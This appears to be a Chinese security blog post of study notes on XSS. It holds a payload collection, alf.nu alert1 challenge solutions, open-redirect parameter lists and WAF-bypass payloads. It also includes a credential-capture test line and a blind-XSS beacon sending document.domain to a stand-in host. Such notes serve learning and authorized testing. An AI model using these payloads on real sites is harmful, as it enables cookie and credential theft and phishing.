<!DOCTYPE html>
<html lang="zh-cn">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/avatar.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="D3vil">
  <meta name="keywords" content="CTF 期货">
  <title>xss_train - D3vil&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>D3vil</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-06-19 22:34">
      2020年6月19日 晚上
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      45
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h2 id="xss-fuck"><a href="#xss-fuck" class="headerlink" title="xss fuck"></a>xss fuck</h2><h4 id="收集的payload"><a href="#收集的payload" class="headerlink" title="收集的payload"></a>收集的payload</h4><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">x</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert(1)</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">img</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">svg</span>/<span class="hljs-attr">onload</span>=<span class="hljs-string">alert(1)</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span>
" onmouseover=alert(1) a="
javascript:alert(1)
<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">hr</span>&gt;</span>123321
<span class="hljs-tag">&lt;<span class="hljs-name">isindex</span> <span class="hljs-attr">type</span>=<span class="hljs-string">image</span> <span class="hljs-attr">src</span>=<span class="hljs-string">1</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert(1)</span>&gt;</span> 
<span class="hljs-tag">&lt;<span class="hljs-name">isindex</span> <span class="hljs-attr">action</span>=<span class="hljs-string">javascript:alert(1)</span> <span class="hljs-attr">type</span>=<span class="hljs-string">image</span>&gt;</span> 
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">x:alert(alt)</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">eval(src)</span> <span class="hljs-attr">alt</span>=<span class="hljs-string">0</span>&gt;</span> 
<span class="hljs-tag">&lt;<span class="hljs-name">x:script</span> <span class="hljs-attr">xmlns:x</span>=<span class="hljs-string">"http://www.w3.org/1999/ xhtml"</span>&gt;</span>alert('xss');<span class="hljs-tag">&lt;/<span class="hljs-name">x:script</span>&gt;</span> 
"&gt;<span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4#"</span>&gt;</span>


a='',b=!a+a,c=!a+b,d=a+&#123;&#125;,e=b[a++],f=


𓅂='',𓂀=!𓅂+𓅂,𓁄=!𓂀+𓅂,𓊎=𓅂+&#123;&#125;,𓆣=𓂀 
[𓅂++],𓊝=𓂀[𓇎=𓅂],𓏢=++𓇎+𓅂,𓆗=𓊎[𓇎+𓏢
],𓂀[𓆗+=𓊎[𓅂]+(𓂀.𓁄+𓊎)[𓅂]+𓁄[𓏢]+𓆣+
𓊝+𓂀[𓇎]+𓆗+𓆣+𓊎[𓅂]+𓊝][𓆗](𓁄[𓅂]+𓁄[
𓇎]+𓂀[𓏢]+𓊝+𓆣+'`𓅂 𓏢 𓂀 𓁄 𓆣 𓊝 𓇎`')``

a='',b=!a+a,c=!b+a,l=a+&#123;&#125;,d=b
[a++],e=b[f=a],m=++f+a,n=l[f+m
],b[n+=l[a]+(b.c+l)[a]+c[m]+d+
e+b[f]+n+d+l[a]+e][n](c[a]+c[
f]+b[m]+e+d+'`a m b c d e f`')``

<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">width</span>=<span class="hljs-string">"26"</span> <span class="hljs-attr">height</span>=<span class="hljs-string">"26"</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"https://carry_yourg?x-oss-process=image/resize,w_100,h_100"</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">m</span> <span class="hljs-attr">onclick</span>=<span class="hljs-string">"alert(1)"</span>&gt;</span>M" alt=""class="chat-avatar"<span class="hljs-symbol">&amp;gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">m</span>&gt;</span>

<span class="hljs-tag">&lt;<span class="hljs-name">noscript</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">p</span> <span class="hljs-attr">title</span>=<span class="hljs-string">" &lt;/noscript&gt;</span></span>
<span class="hljs-tag"><span class="hljs-string">&lt;style onload= alert(document.domain)//"</span>&gt;</span>*&#123;/*all*/color/*all*/:/*all*/#e84393/*all*/;&#125;<span class="hljs-tag">&lt;/<span class="hljs-name">style</span>&gt;</span>

SearchText=%26%2334%3B%3E%3Ca%20href%3D%22%26%230000106%26%23000097%26%230000118%26%23000097%26%230000115%26%23000099%26%230000114%26%230000105%26%230000112%26%230000116%26%23000058%26%23000099%26%230000111%26%230000110%26%230000115%26%230000111%26%230000108%26%230000101%26%23000046%26%230000108%26%230000111%26%230000103%26%23000040%26%23000047%26%230000120%26%230000115%26%230000115%26%23000047%26%23000041%22+onblur%3Dconsole.log+q%3D

<span class="hljs-meta">&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;</span>
<span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-meta-keyword">svg</span> <span class="hljs-meta-keyword">PUBLIC</span> <span class="hljs-meta-string">"-//W3C//DTD SVG 1.1//EN"</span> <span class="hljs-meta-string">"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">version</span>=<span class="hljs-string">"1.1"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"Layer_1"</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">"http://www.w3.org/2000/svg"</span> <span class="hljs-attr">xmlns:xlink</span>=<span class="hljs-string">"http://www.w3.org/1999/xlink"</span> <span class="hljs-attr">x</span>=<span class="hljs-string">"0px"</span> <span class="hljs-attr">y</span>=<span class="hljs-string">"0px"</span> <span class="hljs-attr">width</span>=<span class="hljs-string">"100px"</span> <span class="hljs-attr">height</span>=<span class="hljs-string">"100px"</span> <span class="hljs-attr">viewBox</span>=<span class="hljs-string">"0 0 751 751"</span> <span class="hljs-attr">enable-background</span>=<span class="hljs-string">"new 0 0 751 751"</span> <span class="hljs-attr">xml:space</span>=<span class="hljs-string">"preserve"</span>&gt;</span>  <span class="hljs-tag">&lt;<span class="hljs-name">image</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"image0"</span> <span class="hljs-attr">width</span>=<span class="hljs-string">"751"</span> <span class="hljs-attr">height</span>=<span class="hljs-string">"751"</span> <span class="hljs-attr">x</span>=<span class="hljs-string">"0"</span> <span class="hljs-attr">y</span>=<span class="hljs-string">"0"</span></span>
<span class="hljs-tag">    <span class="hljs-attr">href</span>=<span class="hljs-string">"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo"</span> /&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span>


autofocus onfocus=alert(1)

style="width: 100vw; height: 100vh; position: fixed; top: 0; left: 0; z-index: 1000;"  全屏
<span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"#"</span> <span class="hljs-attr">autofocus</span> <span class="hljs-attr">onfocus</span>=<span class="hljs-string">"alert(1)"</span> &gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span>自动触发
testtest<span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">alert&amp;lpar;document.domain&amp;#41;</span>&gt;</span>testtest<span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">alert&amp;lpar;document.cookie&amp;#41;</span>&gt;</span>testtest
"&gt;<span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">javascript&amp;colon;alert&amp;lpar;document.cookie)</span>&gt;</span>    
<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">x:alert(alt)</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">eval(src)</span> <span class="hljs-attr">alt</span>=<span class="hljs-string">1</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">form</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">formaction</span>=<span class="hljs-string">javascript:alert(1)</span> <span class="hljs-attr">type</span>=<span class="hljs-string">submit</span> <span class="hljs-attr">value</span>=<span class="hljs-string">click</span>&gt;</span></code></pre>



<h4 id="https-alf-nu-alert1"><a href="#https-alf-nu-alert1" class="headerlink" title="https://alf.nu/alert1"></a><a href="https://alf.nu/alert1" target="_blank" rel="noopener">https://alf.nu/alert1</a></h4><p>第一关</p>
<pre><code class="hljs js"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escape</span>(<span class="hljs-params">s</span>) </span>&#123;
  <span class="hljs-keyword">return</span> <span class="hljs-string">'&lt;script&gt;console.log("'</span>+s+<span class="hljs-string">'");&lt;/script&gt;'</span>;
&#125;</code></pre>

<p>显然闭合构造注释”);alert(1)//</p>
<p>第二关</p>
<pre><code class="hljs scilab"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escape</span><span class="hljs-params">(s)</span> &#123;</span>
  s = s.replace(/<span class="hljs-string">"/g, '</span>\\<span class="hljs-string">"'</span>);
  <span class="hljs-keyword">return</span> <span class="hljs-string">'&lt;script&gt;console.log("</span><span class="hljs-string">' + s + '</span><span class="hljs-string">");&lt;/script&gt;'</span>;
&#125;</code></pre>



<p>懵圈，本想换行符绕过应为正则里面没写m，结果不知为啥执行不了叼他妈的。</p>
<p>换个姿势，报错说是换行符没转义，加个\就正常了，想到用\注释原先的转义符绕过</p>
<p>\“);alert(1)//</p>
<p>第三关</p>
<pre><code class="hljs js"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escape</span>(<span class="hljs-params">s</span>) </span>&#123;
  s = <span class="hljs-built_in">JSON</span>.stringify(s);
  <span class="hljs-keyword">return</span> <span class="hljs-string">'&lt;script&gt;console.log('</span> + s + <span class="hljs-string">');&lt;/script&gt;'</span>;
&#125;

&lt;<span class="hljs-regexp">/script&gt;&lt;script&gt;alert(1);/</span><span class="hljs-regexp">/</span></code></pre>

<p>全转义</p>
<p>爷给你闭合之前的，再构造</p>
<p>第四关</p>
<p><a href="https://alf.nu/alert(1)#accesstoken=6uEjiGpGDYL5CZGWEf5p" target="_blank" rel="noopener">https://alf.nu/alert(1)#accesstoken=6uEjiGpGDYL5CZGWEf5p</a></p>
<p>过不去，，，</p>
<p>第五关</p>
<p><img src="/img/buu/xss_1.png" srcset="/img/loading.gif" alt=""></p>
<p>经过调试后可以构造createElement来执行function，其中apply的作用和call类似可以把后面的数组作为参数</p>
<h2 id="url"><a href="#url" class="headerlink" title="url"></a>url</h2><p>跳转参数</p>
<pre><code class="hljs vim">redirect
url
redirectUrl
?callback
return_url
toUrl
ReturnUrl
fromUrl
redUrl
request
redirect_to
redirect_url
jump
jump_to
target
targetUrl
<span class="hljs-keyword">to</span>
<span class="hljs-keyword">goto</span>
link
linkto
domain
oauth_callback
referrerdomain
<span class="hljs-keyword">next</span>
service
?redirect=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;url=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;redirectUrl=url=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;callback=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;return_url=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;ReturnUrl=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>?<span class="hljs-keyword">next</span>=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;redirect_url=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;redirect_uri=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;target=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span>&amp;<span class="hljs-keyword">continue</span>=http<span class="hljs-variable">s:</span>//baidu.<span class="hljs-keyword">com</span></code></pre>

<p>跳转</p>
<pre><code class="hljs routeros">&lt;meta <span class="hljs-attribute">http-equiv</span>=<span class="hljs-string">"Refresh"</span> <span class="hljs-attribute">content</span>=<span class="hljs-string">"1; url=http://www.baidu.com"</span>/&gt;
history.go(-1),history.back(-1)
location.<span class="hljs-attribute">href</span>=<span class="hljs-string">'//baidu.com'</span> 服务端的url重定向 location.replace(<span class="hljs-string">'//baidu.com'</span>)
&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">"http://baidu.com"</span>&gt;百度一下&lt;/a&gt;</code></pre>





<p>编码</p>
<pre><code class="hljs angelscript">&amp;quot; &amp;#<span class="hljs-number">34</span>;&amp;#<span class="hljs-number">000034</span></code></pre>

<p>探针</p>
<pre><code class="hljs livescript">jaVasCript:<span class="hljs-comment">/*-/*`/*\`/*'/*"/**/</span>(<span class="hljs-comment">/* */</span>oNcliCk=alert() ) <span class="hljs-regexp">//%0D%0A%0d%0a//</span>&lt;<span class="hljs-regexp">/stYle/</span>&lt;<span class="hljs-regexp">/titLe/</span>&lt;<span class="hljs-regexp">/teXtarEa/</span>&lt;<span class="hljs-regexp">/scRipt/</span>--!&gt; <span class="hljs-string">\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e</span></code></pre>

<p>bypass waf</p>
<pre><code class="hljs xml">1.
<span class="hljs-tag">&lt;<span class="hljs-name">style</span>&gt;</span><span class="css"><span class="hljs-keyword">@keyframes</span> x&#123;&#125;</span><span class="hljs-tag">&lt;/<span class="hljs-name">style</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">div</span> <span class="hljs-attr">style</span>=<span class="hljs-string">"animation-name:x"</span> <span class="hljs-attr">onanimationstart</span>=<span class="hljs-string">"alert(1)"</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span>
2.
<span class="hljs-tag">&lt;<span class="hljs-name">math</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"javascript:alert(1)"</span>&gt;</span>CLICKME<span class="hljs-tag">&lt;/<span class="hljs-name">math</span>&gt;</span> firefox
3.
<span class="hljs-tag">&lt;<span class="hljs-name">area</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"javascript:alert(1)"</span> <span class="hljs-attr">style</span>=<span class="hljs-string">"display:block;height:100vh;width:100vw"</span>&gt;</span>click
4.
<span class="hljs-tag">&lt;<span class="hljs-name">svg</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">circle</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">set</span> <span class="hljs-attr">onbegin</span>=<span class="hljs-string">prompt(1)</span> <span class="hljs-attr">attributename</span>=<span class="hljs-string">fill</span>&gt;</span>
5.
<span class="hljs-tag">&lt;<span class="hljs-name">form</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">input%20type=submit%20formaction=%27java%0a%0ascri%0a%0dPt:var%20a="al%0a%0dert(1)";Function(a)()%27</span>&gt;</span>eeee
6.
<span class="hljs-tag">&lt;<span class="hljs-name">object</span> <span class="hljs-attr">data</span>=<span class="hljs-string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">object</span>&gt;</span>
7.
<span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"javascript:alert(1)"</span>&gt;</span>
8.
<span class="hljs-tag">&lt;<span class="hljs-name">embed</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"javascript:alert(1)"</span>&gt;</span> firefox data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
9.
<span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"javascript:alert(1)"</span>&gt;</span> data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
10.
<span class="hljs-tag">&lt;<span class="hljs-name">iframe</span> <span class="hljs-attr">srcdoc</span>=<span class="hljs-string">"&lt;svg/onload=alert(1)&gt;"</span>&gt;</span>
11.
<span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"search"</span> <span class="hljs-attr">onsearch</span>=<span class="hljs-string">"alert(1)"</span>&gt;</span>
12.
<span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"submit"</span> <span class="hljs-attr">formaction</span>=<span class="hljs-string">"javascript:alert(1)"</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span>
13.
<span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">"javascript:alert(1)"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"submit"</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span>

oncanplay
ontouchstart
ontouchmove
ontouchend
ontouchcancel
onpageshow</code></pre>

<pre><code class="hljs yaml">
<span class="hljs-string">网站业务分析</span>

 <span class="hljs-number">1</span><span class="hljs-string">.熟悉开发人员</span>


<span class="hljs-number">1</span><span class="hljs-string">.熟悉网站开发的前后端使用技术，客户端渲染？服务端渲染？，熟悉开发使用的语言与框架，前端：html，js，jquery，vue，react...？，后端：php，python，java，nodejs，.net...？</span>



<span class="hljs-number">2</span><span class="hljs-string">.熟悉开发者开发习惯，前端的标签，函数命名习惯等...，js代码执行逻辑，熟悉开发者的请求接口命名习惯，服务端返回的数据格式，前端请求方式，form表单，xhr，ajax，fetch，jsonp...</span>



<span class="hljs-number">2</span><span class="hljs-string">.熟悉应用业务功能</span>


<span class="hljs-number">1</span><span class="hljs-string">.通过搜索引擎，企业查询，第三方信息整合平台，了解应用业务功能，社交，信息搜索，门户网站，管理系统...。熟悉网站的功能，评论，文件上传，即时通讯...</span>



<span class="hljs-number">2</span><span class="hljs-string">.熟悉应用的功能实现，注册，登录，信息修改，聊天功能等前后端实现逻辑</span>



<span class="hljs-number">3</span><span class="hljs-string">.分析功能点的业务风险xss,csrf,url跳转...，掌握常见业务风险点测试流程。强化测试思路，掌握利用方式。</span>



<span class="hljs-string">常见web安全漏洞</span>

<span class="hljs-number">1.</span><span class="hljs-string">url跳转</span>
<span class="hljs-number">1</span><span class="hljs-string">.产生该漏洞的原因，位置？登录回跳，支付回跳...漏洞危害，利用方式</span>



<span class="hljs-string">常见跳转参数：</span>

<span class="hljs-string">redirect</span>
<span class="hljs-string">url</span>
<span class="hljs-string">redirectUrl</span>
<span class="hljs-string">callback</span>
<span class="hljs-string">return_url</span>
<span class="hljs-string">toUrl</span>
<span class="hljs-string">ReturnUrl</span>
<span class="hljs-string">fromUrl</span>
<span class="hljs-string">redUrl</span>
<span class="hljs-string">request</span>
<span class="hljs-string">redirect_to</span>
<span class="hljs-string">redirect_url</span>
<span class="hljs-string">jump</span>
<span class="hljs-string">jump_to</span>
<span class="hljs-string">target</span>
<span class="hljs-string">targetUrl</span>
<span class="hljs-string">to</span>
<span class="hljs-string">goto</span>
<span class="hljs-string">link</span>
<span class="hljs-string">linkto</span>
<span class="hljs-string">domain</span>
<span class="hljs-string">oauth_callback</span>
<span class="hljs-string">referrerdomain</span>
<span class="hljs-string">next</span>


<span class="hljs-string">利用方式:</span>

<span class="hljs-string">钓鱼网站</span>

<span class="hljs-string">javascript协议的xss</span>

<span class="hljs-string">携带用户敏感信息，token跳转</span>



<span class="hljs-string">常见payload:</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-number">1</span><span class="hljs-string">.?reidrect=https://baidu.com</span>
<span class="hljs-number">2</span><span class="hljs-string">.?reidrect=https://a.com@b.com</span>
<span class="hljs-number">3</span><span class="hljs-string">.?reidrect=//b.com</span>
<span class="hljs-number">4</span><span class="hljs-string">.?reidrect=javascript:alert(1)</span>
<span class="hljs-number">5</span><span class="hljs-string">.?reidrect=@baidu.com</span>
﻿﻿

<span class="hljs-number">2.</span><span class="hljs-string">Xss</span>
<span class="hljs-number">1</span><span class="hljs-string">.熟悉xss常见的输出位置，搜索，评论，内容渲染，形成的原理，危害，常见利用方式（盗取用户cookie，实现无账号密码登录其他用户网页，所cookie为httponly，可通过js代码让用户发送任意请求），xss的不同类型：</span>



<span class="hljs-string">反射型xss：直接响应html代码，如&lt;script&gt;alert(1)&lt;/script&gt;，&lt;img</span> <span class="hljs-string">src=x</span> <span class="hljs-string">onerro=alert(1)&gt;，在页面直接触发，</span>



<span class="hljs-string">储存型：将输入内容储存至数据库，并在访问该内容时触发</span>



<span class="hljs-string">dom型：只通过一定用户交互或在客户端js代码执行过程中触发</span>



<span class="hljs-number">2</span><span class="hljs-string">.如何发现xss漏洞，查找输入点，输入框，url参数，审计代码，查找输出点，通过搜索代码中的输入内容检索代码中出现的位置，次数，观察过滤规则，是否过滤了&lt;&gt;,",'等特殊符号</span>



<span class="hljs-number">3</span><span class="hljs-string">.输出在不同位置的常见payload：</span>



<span class="hljs-string">直接输出在html中：</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">&lt;svg</span> <span class="hljs-string">onload=alert(1)&gt;</span>
<span class="hljs-string">输出在html属性中且"，&gt;没被过滤：</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">"&gt;&lt;svg onload=alert(1)//&gt;</span>
<span class="hljs-string">输出在html属性中且&gt;被过滤，"</span><span class="hljs-string">没被过滤：</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">"autofocus onfocus=alert(1)//</span>
<span class="hljs-string">输出在js字符串中且"</span><span class="hljs-string">被过滤，&lt;&gt;没被过滤：</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">&lt;/script&gt;&lt;script&gt;alert(1)//</span>
<span class="hljs-string">输出在js字符串中且&lt;&gt;被过滤，"没被过滤：</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">"-alert(1)//</span>
<span class="hljs-string">输出在a标签href或iframe的src属性中:</span>
<span class="hljs-string"></span>
<span class="hljs-string">Plain Text</span>
<span class="hljs-string">javascript:alert(1)</span>
<span class="hljs-string">输出在html注释中：</span>
<span class="hljs-string"></span>
<span class="hljs-string">Plain Text</span>
<span class="hljs-string">--&gt;&lt;svg onload=alert(1)//&gt;</span>
<span class="hljs-string">输出在js单行注释中：</span>
<span class="hljs-string"></span>
<span class="hljs-string">Plain Text</span>
<span class="hljs-string">%0aalert(1)//</span>
<span class="hljs-string">输出在js多行注释中：</span>
<span class="hljs-string"></span>
<span class="hljs-string">Plain Text</span>
<span class="hljs-string">*/alert(1)/*</span>
<span class="hljs-string"></span>
<span class="hljs-string"></span>
<span class="hljs-string">一些特殊的payload</span>
<span class="hljs-string"></span>
<span class="hljs-string">&lt;body%20onpageshow=alert(1)&gt;</span>
<span class="hljs-string"></span>
<span class="hljs-string">&lt;details ontoggle=alert(1) open&gt;test&lt;/details&gt;</span>
<span class="hljs-string"></span>
<span class="hljs-string">&lt;a autofocus onfocus=alert(1) href="</span><span class="hljs-comment">#"&gt;x&lt;/a&gt;</span>

<span class="hljs-string">--&gt;&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;!--&lt;script&gt;</span>

<span class="hljs-string">&lt;video</span> <span class="hljs-string">src=http://1252524126.vod2.myqcloud.com/2919df88vodtranscq1252524126/0c702fd15285890790259780332/v.f30.mp4</span> <span class="hljs-string">controls</span> <span class="hljs-string">oncanplay=alert(1)&gt;</span>





<span class="hljs-string">（对输出在js中且能打破原本结构的payload需要构造正确的js语法）</span>



<span class="hljs-number">4</span><span class="hljs-string">.熟悉编码的使用，url编码，html编码，url编码通常用于服务端无法正常接收一些特殊符号导致页面无妨访问，或内容输出在html内且特殊符号被过滤的情况，再使用html编码进行绕过时在通过url编码该内容，（通常html编码后的内容符号在url中有特殊含义，如&amp;lt;为&lt;的html编码，&amp;本身在url表示参数拼接，此时应该再对html编码后的内容进行url编码避免符号冲突）</span>



<span class="hljs-number">5</span><span class="hljs-string">，观察利用方式，如结合本地存储的xss进行利用。对出现在登录位置的xss观察是否能直接拦截账号密码，常用测试语句，如url跳转中的xss(此处的元素id名应根据具体情况更换):</span>



<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">javascript:prompt(document.getElementById(`loginName`).value,document.getElementById(`loginPwd`).value)</span>


<span class="hljs-number">6</span><span class="hljs-string">.对于盲注类型的xss，通过</span>

<span class="hljs-string">Plain</span> <span class="hljs-string">Text</span>
<span class="hljs-string">&lt;script&gt;new</span> <span class="hljs-string">Image().src="//xxx.com?"+document.domain</span> <span class="hljs-string">&lt;/script&gt;</span>
